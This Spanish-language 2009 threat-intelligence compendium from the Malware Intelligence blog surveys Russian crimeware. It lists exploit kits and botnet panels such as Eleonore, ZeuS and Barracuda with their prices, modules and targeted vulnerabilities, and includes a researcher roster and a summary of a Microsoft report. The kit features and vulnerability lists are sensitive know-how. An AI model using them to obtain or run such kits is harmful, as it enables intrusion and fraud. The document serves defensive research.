3

Malware Intelligence

Compendio anual de información - El crimeware durante el 2009 -

Jorge Mier es | Malware Intelligence Blog | [email protected] http://mipistus.blogspot.com | http://malwareint.blogspot.com | http://malwaredisasters.blogspot.com | Diciembre, 2009

4

Contenido

Agradecimientos , 8

¿Qué es Malware Intelligence? , 9

Malware Disasters Team , 9

Malware Intelligence Linkedin Group , 9

Panorama actual de negocio ocasionado por crimeware, 11 Los precios del crimeware ruso , 12 Sploit25, 12 Unique Sploits Pack, 12 Neon Exploit System, 12 XS[S]hkatulka, 12 Cripta Zeus(a), 12 ElFiesta Exploit Pack, 12 YES Exploit System, 13 PoisonIvy Polymorphic Online Builder, 13 FriJoiner Small y Private, 13 Genom Iframer, 13 CRUM Crypter Polymorphic, 13

Los precios del crimeware ruso. Parte 2 , 14 CRUM Crypter Polymorphic v2.6, 14 CRUM Joiner Polymorphic v3.1, 14 Eleonore Exploit Pack v1.2, 14 Eleonore Exploit Pack v1.1, 14 Unique Sploits Pack v2.1, 15 Adrenaline, 15 YES Exploit System v2.0.1, 15 YES Exploit System v1.2.0, 15 Barracuda Botnet v3.0, 15 ZeuEsta v7.0, 16 ZeuEsta v5.0, 16 ElFiesta Exploit Pack v3.0, 16 Liberty Exploit System, 16 Neon Exploit System, 17 Limbo trojan, 17 Fragus v1.0, 17

Comercio Ruso de versiones privadas de crimeware ¡Aproveche la oferta! , 18

Estado de la seguridad según Microsoft , 20

Framework Exploit Pack para botnets de propósito general Fusión. Un concepto adoptado por el crimeware actual II, 24 Una breve mirada al interior de Fragus, 24 Desarrollo de Botnets Open Source. “My last words”?, 27 QuadNT System. Sistema de administración de zombis I (Windows), 28 ZoPAck. Nueva alternativa para la explotación de vulnerabilidades, 29 ZeuS Botnet y su poder de reclutamiento zombi, 30 ZeuS, spam y certificados SSL, 33 Nueva versión de Eleonore Exploits Pack In-the-Wild, 35 5

Hybrid Botnet Control System. Desarrollo de http bot en perl, 36 Desarrollo de crimeware Open Source para controlar y administrar botnets, 37 Fragus. Nueva botnet framework In-the-Wild, 40 Liberty Exploit System. Otra alternativa crimeware para el control de botnets, 42 TRiAD Botnet III. Administración remota de zombis multiplataforma, 44 Eleonore Exploits Pack. Nuevo crimeware In-the-Wild, 46 TRiAD Botnet II. Administración remota de zombis multiplataforma, 48 TRiAD Botnet. Administración remota de zombis en Linux, 49 Especial!! ZeuS Botnet for Dummies, 52 ElFiesta. Reclutamiento zombi a través de múltiples amenazas, 54 Mirando de cerca la estructura de Unique Sploits Pack, 56 Fusión. Un concepto adoptado por el crimeware actual, 59 Botnet. Securización en la nueva versión de ZeuS, 60 YES Exploit System. Manipulando la seguridad del atacante, 62 Unique Sploits Pack. Manipulando la seguridad del atacante II, 65 ZeuS Carding World Template. Jugando a cambiar la cara de la botnet, 67 Adrenaline botnet: zona de comando. El crimeware ruso marca la tendencia, 69 Chamaleon botnet. Administración y monitoreo de descargas, 70 YES Exploit System. Otro crimeware made in Rusia, 72 Entidades financieras en la mira de la botnet ZeuS, 73 Barracuda Bot. Botnet activamente explotada, 76 Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades, 78 ZeuS Botnet. Masiva propagación de su troyano, 79 Danmec Bot, redes Fast-Flux y reclutamiento de Zombis PC’s, 81

Framework Exploit Pack para botnets de propósito particular Siberia Exploit Pack. Otro paquete de explois In-the-Wild, 85 RussKill. Aplicación para realizar ataques de DoS, 86 JustExploit. Nuevo Exploit Kit que explota Java, 87 DDoS Botnet. Nuevo crimeware de propósito particular, 88 T-IFRAMER. Kit para la inyección de malware In-the-Wild, 90 DDBot. Más gestión de botnets vía web, 95 Phoenix Exploit’s Kit. Otra alternativa para el control de botnets, 97 iNF`[LOADER]. Control de botnets, marihuana y propagación de malware, 98 LuckySploit, la mano derecha de ZeuS, 100

Servicios asociados al crimeware Servicio ruso en línea para comprobar la detección de malware, 103 Nivel de (in)madurez en materia de prevención, 107 Automatización en la creación de exploits, 110 Software as a Service en la industria del malware, 112 Automatización de procesos anti-análisis a través de crimeware, 115 Automatización de procesos anti-análisis II, 116 Scripting attack. Explotación múltiple de vulnerabilidades, 118 Scripting attack II. Conjunción de crimeware para obtener mayor infección, 120 Explotación de vulnerabilidades a través de archivos PDF, 123 Explotando vulnerabilidades a través de SWF, 124 Explotación de vulnerabilidades a través de JS, 125 Phishing Kit. Creador automático de sitios fraudulentos, 127 Phishing Kit In-the-Wild para clonación de sitios web, 128 Phishing Kit In-the-Wild para clonación de sitios web, versión 2, 131 Creación Online de malware polimórfico basado en PoisonIvy, 132 Entendiendo las redes Fast-Flux, 133 Explotación masiva de vulnerabilidades a través de servidores fantasmas, 136 Análisis esquemático de un ataque de malware basado en web, 137 Anatomía del exploit MS08-078 by FireEye, 139

6

Inteligencia en la lucha contra el crimeware Campaña de desinformación para propagar malware, 144 Espionaje informático a través de malware, 145 CYBINT en el negocio de los ciber-delincuentes rusos, 146 Inteligencia informática, Seguridad de la Información y Ciber-Guerra, 148

Campañas de propagación e infección Exploit Pack y su relación con el rogue, 151 Testimonios sobre scareware y estrategia de credibilidad, 152 Anti-Virus Live 2010. Chateando con el enemigo, 153 Campaña de propagación de Koobface a través de Blogspot, 155 Campaña de phishing orientada a usuarios de MSN, 157 Pornografía. Excusa perfecta para la propagación de malware II, 158 Rompiendo el esquema convencional de infección, 160 Propagación automática de códigos maliciosos vía http, 162 Eficacia de los antivirus frente a ZeuS, 165 Green IT utilizado para la propagación de scareware, 166 La peligrosidad de una nueva generación de bootkits, 170 Bootkit multiplataforma al ataque. ¿La resurrección de los virus de arranque?, 171 Waledac/Storm. Pasado y presente de una amenaza latente, 172 Campaña de propagación/infección lanzada por Waledac, 175 Propagación de Malware a través de formato de blogging y BlackHat SEO, 177 Simbiosis del malware actual. Koobface, 179 Supuesto Códec para crear videos HD utilizado como carnada para scam, 181 Scareware. Repositorio de malware In-the-Wild, 183 Pornografía. Excusa perfecta para la propagación de malware, 185 Masiva propagación de malware a través de falsos sitios de entretenimiento, 187 Scareware. Estrategia de engaño propuesta por Personal Antivirus, 189 Campaña de Ingeniería Social visual orientada a plataformas Mac OS X, 190 Estrategia BlackHat SEO propuesta por Waledac, 192 Ingeniería Social visual y el empleo de pornografía como vector de infección, 194 Ingeniería Social visual y el empleo de pornografía como vector de infección II, 196 Campaña de propagación del scareware MalwareRemovalBot, 197 Continúa la importante y masiva campaña scareware, 199 Falsas páginas utilizadas como vector de propagación de malware, 201 Drive-by-Download y Drive-by-Update como parte del proceso de infección, 203 Waledac. Seguimiento detallado de una amenaza latente, 205 Conficker. Cuando lo mediático se hace eco de todos…, 207 Conficker II. Infección distribuida del gusano mediático, 209 Conficker III. Campaña de propagación de falsas herramientas de limpieza, 210 Conficker IV. Dominios relacionados... y controversiales, 211 Ingeniería Social visual para la propagación de malware, 213 Campaña de infección scareware a través de falso explorador de Windows, 214 Estrategia de infección agresiva de XP Police Antivirus, 216 Campaña de propagación de XP Police Antivirus a través de IS Visual, 220 Google Grupos nuevamente utilizado para diseminar porno spam, 221 Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?, 222 AntiSpyware 2009 amplia su oferta maliciosa y utiliza dominios .pro, 223 Waledac más amoroso que nunca, 225 Estrategias de engaño, spam y códigos maliciosos, 227 Waledac e Ingeniería Social en San Valentín, 230 Propagación masiva de malware en falsos códecs, 232 Drive-by Update para propagación de malware, 233 MySpace susceptible a amenazas a través de XSS, 234 Nueva estrategia de IS para diseminar scareware, 235 Técnicas de engaño que no pasan de moda, 236 Atacando sistemas Mac a través de falsa herramienta de seguridad, 237 Ataque de malware vía Drive-by-Download, 238 7

Seguridad "electrónica" y propagación de malware, 239 Malware preinstalado, 240

Anexo I. Otros Exploits Pack que se investigaron , 242

Anexo II. PHP Shell Attack PHP Shell Attack I - SimShell, 248 PHP Shell Attack II - DiveShell, 249

Anexo III. Compendio mensual de información , 251

Anexo IV. Waledac/Storm Línea de tiempo Storm/Waledac ’07-‘09, 255 Línea de tiempo Storm/Waledac 2007, 256 Línea de tiempo Storm/Waledac 2008, 257 Línea de tiempo Storm/Waledac 2009, 258 Puntos de diseminación de Waledac, 259 Diseminación de Waledac desde Argentina, 260

Índice de imágenes , 261 8

Agradecimientos Dedicarle tiempo a cualquier proyecto que uno encare en la vida, significa restar ese tiempo y energía depositada en ello a otras personas; esposa, hijos, padres, hermanos, amigos, trabajo y cualquier ser querido, sobre todo, cuando el tiempo no constituye un factor del cual podamos disponer a placer.

Por lo tanto, quiero agradecer, aunque quizás no se enteren, a mi familia, por soportar verme sentado frente a la computadora hasta altas horas de la noche y durante muchos días libres que podría disfrutar junto a ellos. A mis padres, por forjar en mí el espíritu de tolerancia y sacrificio. A mis hermanos y amigos por apoyar lo que hago y lo que me gusta, a mis seres queridos con quienes cotidianamente comparto la vida desde un ángulo laboral por fortalecer en mí las ganas de continuar por el mismo camino.

A los lectores de mis cosas, porque independientemente de la satisfacción personal que implica esta labor, existe un objetivo encubierto que es el de compartir con ellos la información que resulta de diversas investigaciones, aunque esa información sea parcial por la misma naturaleza de la investigación.

También deseo reconocer con un especial agradecimiento a Joaquín Rodríguez Varela (Argentina) y Ernesto Martín (España), Vulnerability Research y Malware Research respectivamente en Malware Intelligence, por sus valiosísimas colaboraciones.

¡Muchas gracias a todos!

Jorge Mieres Malware Intelligence Blog Diciembre, 2009 9

¿Qué es Malware Intelligence? Malware Intelligence es un sitio dedicado a la investigación de todo lo relacionado con la seguridad anti-malware, crimeware y seguridad de la información en general, desde una perspectiva estrechamente relacionada con el ámbito de inteligencia. http://mipistus.blogspot.com
Español http://malwareint.blogspot.com
Inglés

Malware Disasters Team Malware Disasters Team es una división de Malware Intelligence de reciente creación, en el cual se plasma información relacionada a las actividades que realizan determinados códigos maliciosos, ofreciendo también las contramedidas necesarias para contrarrestar las acciones maliciosas en cuestión. http://malwaredisasters.blogspot.com
Inglés

Malware Intelligence LinkedIn Group Malware Intelligence es un proyecto que por el momento se encuentra en su etapa inicial y forma parte de un sitio web que a futuro estará disponible para toda la comunidad de Seguridad de la Información en general y Seguridad Antivirus en particular.

A continuación dejo una captura que corresponde a una de las secciones del sitio.

Su creación fue motivada por una serie de proyectos en materia de seguridad cuya intención es canalizarlos a través de esa vía pero al mismo tiempo proyectarlo hacia todos aquellos que deseen colaborar.

10

Actualmente el grupo cuenta con casi 100 miembros desde su creación en el mes de agosto de 2009 y por el momento no se han dado a conocer los proyectos (sin embargo espero poder hacerlo para arrancar con todo el próximo año). Todos aquellos que quieran participar son bienvenidos.

Agradezco que formen parte de este proyecto, entre los que se encuentran:

Ahmed Mustafa - Security Engineer at Ministry of Communications and Information Technology (Egipto) Alexander Matrosov - Senior virus researcher at ESET (Rusia)
http://amatrosov.blogspot.com Andres Riancho - Founder at Bonsai Information Security (Argentina)
http://w3af.sourceforge.net Anwar Anabtawi - IT Tech Support at Obeikan-Riverdeep (Arabia Saudita)
http://www.virusexperts.org Arief Prabowo - Malware Analyst at Emsi Software (Indonesia) Arrizen Valcarcel - Virus Research at Panda Software International (España) Bhalaji d bhalaji - Network engineer at Technosoft global services (India) Bruce Cowan - Senior Consultant at Torstaff Personnel (Canadá) Christian Navarrete - Penetration Tester (EE.UU)
http://chr1x.sectester.net Dani L. Creus - eCrime Intelligence Analyst at S21sec (España)
http://blog.s21sec.com Dario Blanco - Docente en Educacion IT (Argentina)
http://www.darioblanco.com.ar Diego González - Security Researcher/Analyst (España)
http://dgonzalez.net Eric Kumar - Sr. Anti-Malware Researcher (EE.UU)
http://fightmalware.blogspot.com Ernesto Martin Hermida - IT Security Analyst at ING DIRECT (España) Eugene Teo - Security Response at Red Hat | GCIH, RHCE, RHCA, RHCDS, RHCSS (Singapur) Exploit dev - Telecommunications Professional (EE.UU)
http://extraexploit.blogspot.com Federico Galarza - CCNA, Wintel Administrator en HP Enterprise Services (Argentina) Haroon Malik - Malware Researcher, Principal Software Engineer en Palmchip Inc (Pakistán) Jacques Erasmus - Director of Malware Research - Prevx (Reino Unido)
http://www.prevx.com Jaime Blasco - Vulnerability Research at AlienVault (España)
http://www.alienvault.com/blog/jaime James Duldulao - Web Security Researcher at McAfee (EE.UU)
http://www.trustedsource.org Jason Williams - Sr. Sys Admin/Database Administrator at General Atomics Aeronautical (EE.UU) Joaquin Rodriguez Varela - Sales Engineer at ESET (Argentina)
http://insegar.blogspot.com José Alfredo Jiménez - Asesor IT (El Salvador)
http://topinfo.dyndns.info Jose Carlos de Arriba , CISSP - Security Analyst / Penetration Tester at Telefonica (España) Kevin Stevens - Threat Intelligence Analyst at SecureWorks (EE.UU) Larry Stevenson - Global Moderator at Spywarehammer (Canadá)
http://mvp-help.webs.com/apps/blog Lenny Zeltser - Security Consulting Practice Director en SAVVIS, Inc. (EE.UU) Lucian Dandea - Network Administrator at Cord Blood Center (Romania) Marcelo Acosta - Area Infraestructura Tecnológica (Argentina) Marcelo Rivero - Founder at InfoSpyware.com (EE.UU)
http://www.infospyware.com/blog Marchelle David - Senior Researcher en HCL - CA (India)
http://threatmarchelle.wordpress.com Marcin Kleczynski - CEO at Malwarebytes Corporation (EE.UU)
http://www.malwarebytes.org Marco Giuliani - Malware Technology Specialist at Prevx (Italia)
http://www.pcalsicuro.com/main Marek Zmyslowski - SSLScanner designer and developer at SourceForge, Inc (Polonia) Mariano Graziano - IT Security Researcher (Italia)
http://5d4a.wordpress.com Mark Arena - Technical Specialist at Australian Federal Police (Australia) Mattia Cinacchi Mattia - Senior Consultant en Symantec (Italia) Methusela Cebrian - Senior Research Engineer at HCL Technologies - CA (Australia)
http://ithreats.net Michael Mondragon - Systems Engineer at Trend Micro
http://themikefiles.wordpress.com Mounir Kamal - Senior Information Security Analyst at Q-CERT (Egipto) Nahuel Cayetano - Research Engineer at Core Security (Argentina)
http://crackinglandia.blogspot.com Osama Kamal - Sr. Incident Analyst en Qatar CERT (Q-CERT) (Egipto) Palaniyappan balasubramanian - Threat Reseach Analyst at Comodo Antivirus Lab (India) Pepijn Janssen - Cyber Crime Expert, Founder at Omnivore.nl (Países Bajos)
http://www.omnivore.nl Rajdeep Chakraborty - MVP, Associate IT Consultant ITC Infotech (India)
http://www.malwareinfo.org Rodrigo Calvo - Systems Engineer at LAM Symantec (Costa Rica) Rommel Ramos - Computer Virus Analyst at Authentium Inc. (EE.UU) Sachin Deodhar , CISSP - Director Threat Intelligence (Central Asia) at iSIGHT Partners (EE.UU) Samuel Jebamani - Programmer at k7 computing (India)
http://samuel.co.in/blog Sebastian Bortnik - Analista de Seguridad at ESET (Argentina)
http://unmundobinario.com Siva Gnanam - Research/Virus Analyst at Comodo (India) Siva Subramaniyam - Threat Research Analyst at Technosoft (India)
http://traversecode.blogspot.com Suresh Kumar - Malware Research at Comodo Security (India) Tomer Bitton - Security Researcher at Radware (Israel) Vicente Aguilera - Internet Security Auditors (España) 11

Panorama actual del negocio originado por crimeware

Sin lugar a dudas, el panorama actual de las acciones delictivas globales que se canalizan a través de la web constituye un negocio redondo y oscuro que se gesta en lo más subterráneo de los diferentes ambientes que ofrece Internet, robando información privada a través de diferentes "bichos"…

…que se diseminan ejecutando diferentes "planes" estratégicamente pensados, incluso desarrollando aplicaciones destinadas a automatizar los procesos delictivos que se comercializan en un mismo entorno clandestino, para luego trasformar todo en dinero.

Sin más preámbulo... la imagen resume todo :)

12

Los precios del crimeware ruso Al ver la cantidad de dominios rusos creados para diseminar malware, y la gran variedad de aplicaciones diseñadas desde aquellas tierras para cometer diferentes tipos de delitos que buscan quedarse con la mercancía más valiosa: la información; imagino a Rusia como si fuese algo parecido al mundo que describe Gibson en Neuromante donde viejas callejuelas oscuras son utilizadas para la venta y alquiler clandestino de todo tipo de programas diseñados para romper las protecciones de seguridad.

Los delincuentes informáticos y el mercado negro de crimeware parecerían estar a la orden del día en Rusia. Con lo cual, quiero reflejar algunos números que dan una idea de lo que puede llegar a costar preparar ataques a través de un importante número de “recursos” disponibles, como diría un mercenario, al mejor postor.

Sploit 25 Es un crimeware que contiene diferentes exploit para vulnerabilidades en Internet Explorer 6 y 7, y en archivo PDF. Existe una versión Lite cuyo valor es de USD 1500 y USD 2500 la versión Pro.

Unique Sploits Pack Otro crimeware que contiene varios Exploit para diferentes vulnerabilidades. Su valor es de USD 600 . Por USD 100 se accede a las actualizaciones y por USD 50 al un módulo de cifrado.

Neon Exploit System Un conjunto de exploits diseñados para explotar las vulnerabilidades en plataformas Microsoft y diferentes aplicativos de uso masivo. El valor de este crimeware es de USD 500 .

XS[S]hkatulka Conjunto de script diseñados para romper contraseñas de webmail a través de XSS. Según sus creadores, la aplicación “es ideal para comenzar a ganar dinero mediante la prestación de servicios para obtener las contraseñas de las cuentas de correo. Su valor es de USD 110 .

Cripta Zeus(a) Es un servicio cuyo fin es cifrar los troyanos que reclutan zombies PC’s para la botnet ZeuS. Los “servicios” ofrecidos son:

• Construir criptas individuales (your.exe) la primera vez: USD 49 • Construir criptas individuales (your.exe) cifrar cada dos horas: USD 46 • Construir criptas individuales (your.exe) cifrar cada tres horas: USD 43

ElFiesta Exploit Pack Uno de los crimeware más conocidos. Al igual que otros programas similares, se encuentra escrito en PHP y es utilizado para explotar vulnerabilidades a través de técnicas como Drive-by- Download, Scripting, etc. Actualmente es utilizado por la botnet ZeuS. El precio de la última versión es de USD 1000 .

13

YES Exploit System Otro crimeware diseñado para explotar vulnerabilidades a través de exploit y scripts. Su valor es de USD 600 .

PoisonIvy Polymorphic Online Builder Crimeware para generar variantes del troyano PoisonIvy en línea. Su valor es de USD 500 .

FriJoiner Small y Private Una aplicación desarrollada para fusionar archivos ejecutables. Este tipo de aplicaciones es ampliamente utilizado por los diseminadores de malware para evitar que el código malicioso sea detectado. La versión Small cuesta USD 10 y la versión Private USD 15 .

Genom iframer Aplicativo diseñado para automatizar la inyección de etiquetas iframe en sitios vulnerables. Su valor es de USD 40 .

CRUM Cryptor Polymorphic Cripter con características polimórficas pensado para evitar la detección de malware por parte de las compañías antivirus. Su costo de de USD 100 .

Esta es sólo una pequeña lista que representa un porcentaje ínfimo comparado con la cantidad y variedad de aplicaciones crimeware.

La mayoría de los ataques que utilizan Internet como base para atacar se llevan a cabo con programas de este estilo; sin embargo, debemos ser concientes que mientras más informados nos encontremos y mejor utilicemos las tecnologías de seguridad, mayor será el nivel de protección en nuestros entornos de información.

14

Los precios del crimeware ruso. Parte 2 Las actividades delictivas de las cuales cotidianamente se alimentan los ciber-delincuentes a través de un modelo de negocio implantado por ellos mismos, se canalizan a través de la comercialización clandestina que ofrecen “servicios” cada vez más profesionales que se adaptan a las necesidades del ciber-crimen organizado.

En consecuencia, día a día surgen nuevas aplicaciones crimeware destinadas a acrecentar la economía de los ciber-delincuentes, sea cual fuese el rol que cumplen dentro de la cadena delictiva. Algunos de esos crimeware se reflejan a continuación, destacando el costo que poseen dentro del mercado clandestino.

CRUM Cryptor Polymorphic v2.6 Se trata de un aplicativo del tipo Crypter . Su característica principal radica en la capacidad de generar malware polimórfico cifrando cada archivo creado con una clave aleatoria de 256 bytes. También ofrece la posibilidad de someter el malware a procesos anti-análisis como la detección de máquinas virtuales. Su costo es de USD 200 e incluye actualizaciones posteriores de forma gratuitas.

CRUM Joiner Polymorphic v3.1 En este caso, la función principal radica en la capacidad de fusionar archivos de cualquier tipo sin límite en cuanto a la cantidad. Al igual que el anterior permite someter el binario a un proceso de cifrado de 256 bytes, con capacidades polimórficas y detección de máquinas virtuales. Su precio es de USD 100 y las actualizaciones son gratuitas.

Más información sobre esta familia de crimeware.

Eleonore Exploits Pack v1.2 Eleonore es un paquete de explotación de vulnerabilidades y control de redes zombis. El costo de la última versión es de USD 700 . Por un costo adicional de USD 50 se accede a su crypter.

Por defecto, el crimeware se encuentra vinculado a una serie de dominios; sin embargo existe la posibilidad de desvincularlos dejándolo libre pero su valor asciende a USD 1500 , incluyendo el crypter. Está diseñado para explotar las siguientes vulnerabilidades:

• MDAC • MS009-02 • Telnet – Opera • Font tags – FireFox • PDF collab.getIcon • PDF Util.Printf • PDF collab.collectEmailInfo • DirectX DirectShow • Spreadsheet.

Eleonore Exploits Pack v1.1 La versión anterior tiene un costo de USD 500 y a diferencia de la versión 1.2, no posee el módulo exploit Spreadsheet .

15

Unique Sploits Pack v2.1 Otro de los aplicativos diseñados par administrar botnets vía web a través del protocolo http. SU valor actual es de USD 750 e incluye un crypter y actualizaciones posteriores gratuitas. Para quienes poseen versiones antiguas, la actualización a esta versión tiene un valor agregado de USD 200 .

Las vulnerabilidades que permite explotar son:

• MDAC para IE 6 • PDF exploit para IE 7 • Opera • Firefox • PDF exploit para Adobe Acrobat 9 • PDF Doble. Descarga de manera simultánea dos exploits en PDF • MS Office Snapshot para IE 6 y 7 • IE 7 XML SPL • Firefox Embed • IE 7 Uninitialized Memory Corruption Exploit • SPL Amaya 11 • Foxit Reader 3.0 • PDF Buffer Overflow Exploit

Adrenaline Otro de los tantos crimeware diseñados para explotar vulnerabilidades y controlar botnets vía http. Entre las funcionalidades que posee se destacan la posibilidad de hacer uso de pharming local, keylogging, robo de certificados digitales, cifrado de información, técnicas anti-detección, limpieza de huellas, inyección de código viral, entre otros. Su valor es de USD 3000.

YES Exploit System v2.0.1 Uno de los kits de explotación más utilizados. Posee una interfaz que se asemeja a la de un sistema operativo con un menú "Inicio" desde el cual se accede a las diferentes funcionalidades del mismo. El costo de la última versión al día de la fecha (agosto de 2009) es de USD 800 .

YES Exploit System v1.2.0 Algunas paquetes de la primera generación, aún muy activas, varían su precio en función de las versiones. En el caso de la versión 1.2.0, el costo ronda los USD 700 .

Barracuda Botnet v3.0 Última versión de este aplicativo web que a pesar de contar con varios años de existencia, sigue teniendo un costo relativamente elevado en comparación de sus pares. Se trata de un crimeware que posee dos versiones de comercialización, la versión Full a un costo de USD 1600 y la versión Lite a USD 1000 .

Además, este paquete es modular, lo que significa que se pueden agregar módulos conforme a las necesidades del botmaster que la compre o alquile. Los módulos que pueden ser adquiridos son: 16

• Módulo DDoS ( HTTP GET/POST flood, UDP flood, ICMP flood, TCP flood, IP Spoofing ) a un costo de USD 900 . • Módulo Email Grabber que permite recolectar direcciones de correo almacenadas en la zombi. Su valor es de USD 600 . • Módulo Proxy , permite aumentar el número de conexiones simultáneas para un más "eficaz" envío de spam. Su valor es de USD 500 . • Módulo PWDGRAB . Netamente orientado al robo de información privada. El valor del mismo es de USD 500 . • Módulo SSLSOCKS . Este módulo se encuentra en su etapa beta y permite "construir una VPN" a través de la botnet. El precio es de USD 500 .

Con respecto a versiones anteriores, la 2.2 se comercializa a USD 600 y la versión 2.0 a USD 300 .

ZeuEsta Exploit Pack v7.0 Se trata de una "adaptación" privada que se compone de la combinación de dos crimeware muy activos: ZeuS v1.2.4.6 y SPack Exploit Kit . Su costo es de USD 600 y por USD 100 mensuales más se accede a un hosting. Originalmente estaba compuesto por la fusión entre ZeuS y ElFiesta hasta que durante abril de este año (2009) se actualizó reemplazando ElFiesta por SPack Exploit Kit.

Si bien esta fusión de crimeware no es originalmente una creación desarrollada íntegramente por rusos, las diferentes versiones de ZeuS sí lo son y por ese motivo se contempló plasmar su costo.

ZeuEsta Exploit Pack v5.0 Esta versión se consigue en el mercado clandestino a un costo de USD 150 la versión “no oficial”, es decir, la comercializada por terceros y no por el propio autor. Esta versión se compone por ZeuS v1.1.2.2 y ElFiesta .

ElFiesta v3 Otro de los crimeware más explotados por botmasters. En este caso, se trata de la versión 3 cuyo costo es de USD 800 .

El aplicativo posee módulos que permiten explotar más de veinte vulnerabilidades de las cuales las que poseen mayor nivel de eficacia son los exploits para archivos PDF y SWF.

Liberty Exploit System v1.0.5 Un nuevo paquete crimeware de reciente aparición que posee una serie de características particulares que lo hacen, según su propio autor, un aplicativo ideal por su relación precio/calidad.

Por defecto posee preinstalado los siguientes exploits: MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit, PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon(), Flash 9 y MS DirectShow . Su costo es de USD 500 .

17

Neon Exploit System v2.0.5 Neon sufrió una leve rebaja de USD 100. Ahora, su costo es de USD 400 y no de USD 500. Entre los módulos de exploits que se encuentran preinstalados y pre-configurados se encuentran:

• IE7 MC • PDF collab • PDF util.printf • PDF foxit reader • MDAC • Snapshot • Flash 9.

Limbo Trojan Kit Limbo es uno de los crimeware menos populares del mercado clandestino de comercialización rusa. Sin embargo, ello no significa que su peligrosidad sea menor. Con un costo por debajo de otros crimeware mucho más populares, su costo es de USD 300 .

Entre sus funcionalidades se destacan la actualización del binario, limpieza de huellas (cache, cookie, etc.), reinicio del sistema operativo (Windows) y destrucción en caso de ser necesario. Además posee capacidad de keyloggin para capturar todas las contraseñas que se accedan a través de Internet Explorer y las que se encuentren almacenas en el browser, entre otras.

Fragus v1.0 Un muy nuevo aplicativo web que accede a la industria del crimeware a un costo de USD 800 .

Sus características se centran que el soporte multilingüe (inglés y ruso), sistema estadístico sobre el navegador y sistemas operativos (incluyendo sus versiones) y países, capacidad de personalizar los módulos de exploits e incorporar nuevos, inyección de etiquetas iframe, cifrado de archivos, posee un crypter que forma parte del paquete, sin embargo, es posible añadir uno personal.

Como podemos apreciar, la automatización de procesos maliciosos, servicios y ofertas toma relevancia en la compra, venta y alquiler de eficaces “armas” informáticas pensadas netamente con fines delictivos y lucrativos.

En este sentido, los costos del crimeware generado desde Rusia se mueve en función de lo que dicte el mercado, incluso, generando modelos de negocios alternativos como por ejemplo, enfocar el lucro en ofrecer soporte técnico a través de servicios profesionales y personalizados de mantenimiento y actualización de crimeware, retroalimentando así el mercado negro.

18

Comercio Ruso de versiones privadas de crimeware ¡Aproveche la oferta! Actualmente existen muchísimos aplicativos crimeware basados en Kits de administración, control y diseminación de exploits compuestos por diferentes módulos, escritos en php, donde cada uno de ellos posee una función particular.

En el mercado negro Ruso, estos aplicativos son comercializados a diferentes precios que poseen relación directa con las “funcionalidades” ofrecidas por el Kit. Sin embargo, algunas veces aparecen ofertas “jugosas” para que muchos ciber-delincuentes puedan aprovechar; como es el caso de este combo constituido por tres aplicativos crimeware: Neon Exploit System , Sploit25 , Unique Sploits Pack .

Todo por el módico precio de USD 450 .

El precio del combo es más que accesible si consideramos el costo que supone la compra de cada uno de ellos por separado:

• Neon Exploit System = USD 500 • Sploit25 versión Lite = USD 1500 • Sploit25 versión Pro = USD 2500 • Unique Sploits Pack = USD 600 + USD 100 por las actualizaciones del producto (tachado) y USD 50 se obtiene el módulo de cifrado.

Los valores se encuentran un tanto desactualizados. Sin embargo, el costo real que supone la adquisición de los tres pack es de USD 2600 la versión básica de cada crimeware, y de USD 3750 la versión full (versión Pro de Sploit25 y módulo update más cifrado de Unique Sploits Pack).

Además, como todo buen negociante, el ciber-delincuente ofrece la posibilidad de realizar un testeo, previo a la compra, facilitando la demo de los tres kits.

En el caso de Neon Exploit System , se puede ver cada uno de los módulos con los cuales cuenta la aplicación y las “bondades” delictivas que ofrece, como así también la capacidad de almacenar datos estadísticos sobre cada nodo infectado que se va incorporando a la botnet .

19

Con respecto a Sploit25 , desde un primer momento se ve una clara diferencia con respecto a otros aplicativos de su especie durante el proceso de autenticación; el Kit solamente solicita contraseña.

El tercero de los crimeware es Unique Sploits Pack . A través de la demo se puede observar el funcionamiento administrativo del Kit y a las posibilidades de configuración que ofrece, mostrando algunos de los exploits que utiliza junto a referencia a los mismos.

También se puede probar la posibilidad de seleccionar el orden en que cada uno de los exploits intentarán activarse en los sistemas que afecten. En este ejemplo, los módulos de ataque propuestos para los navegadores Internet Explorer 5, 6, 7, 8 y algunas versiones de Firefox se encuentran activadas, mientras que los módulos de ataque para Opera se encuentran inactivos.

A pesar de todo, el “negociante” recurre a otra estrategia de venta, quizás por la época de crisis, y ofrece una oferta aún más jugosa y sólo por una semana, donde el combo sufre un descuento y disminuye su costo a USD 350 .

20

Sin embargo, no termina sólo con la más que accesible oferta ya que el porfolio del "ciber- negociante" es más amplio, y también ofrece la venta de otro crimeware sumamente conocido: ZeuS , a un bajo costo.

De todas formas, la metodología de venta propuesta da para cualquier cosa, y quizás también implique una estrategia encubierta de Ingeniería Social para los “novatos” que se acerquen al ciber-delincuente con el ánimo de comprar el paquete crimeware; ya que, como sucedió en muchos casos, algunos módulos pueden estar backdoreados o, en el caso de ZeuS, el programa que incorpora para generar el cliente puede no ser el real, y ser reemplazado por otro malware que aproveche la “inocencia” del aspirante a ciber-delincuente ;D

Estado de la seguridad según Microsoft En el último Informe de Inteligencia de Seguridad de Microsoft, que ofrece datos estadísticos recavados entre Enero y Junio del año pasado, se desprenden datos más que interesantes sobre la situación que refleja en la actualidad el estado de la seguridad a nivel global.

El mismo se encuentra enfocado en detallar, siempre desde el punto de vista de los especialistas de Microsoft, las vulnerabilidades que se dieron en los diferentes estratos tecnológicos que necesitan un nivel adecuado de protección, y que si bien no es muy diferente a lo que muchos podemos apreciar, resulta un buen punto de partida para idear estrategias de seguridad más efectivas.

Según este informe, la tendencia en las vulnerabilidades disminuyó un 23% durante el semestre en cuestión con relación a todo el año 2007, y más del 90% de estas vulnerabilidades explotaron aplicaciones. Asimismo, el 32% de las vulnerabilidades en aplicaciones de Microsoft poseían un código exploit público y disponible en Internet.

Entre aquellas (vulnerabilidades) basadas en el navegador, el 42% se dieron sobre plataformas WinXP; mientras que, con una gran diferencia, sólo el 6% explotaron Vista. Sin embargo, nada más que el 50% de las 10 vulnerabilidades más críticas afectaron a XP y ninguna a Vista.

21

Si bien lo manifestado por Microsoft a través de este informe es positivo teniendo en cuenta la disminución de los porcentajes antes mencionados, vale la pena hacer un punto aparte en esta instancia y reflexionar sobre algo, que aún hoy sigue siendo preocupante: la falta de actualización en los equipos. De hecho, algo se había mencionado cuando se habló sobre las violaciones de seguridad más comunes.

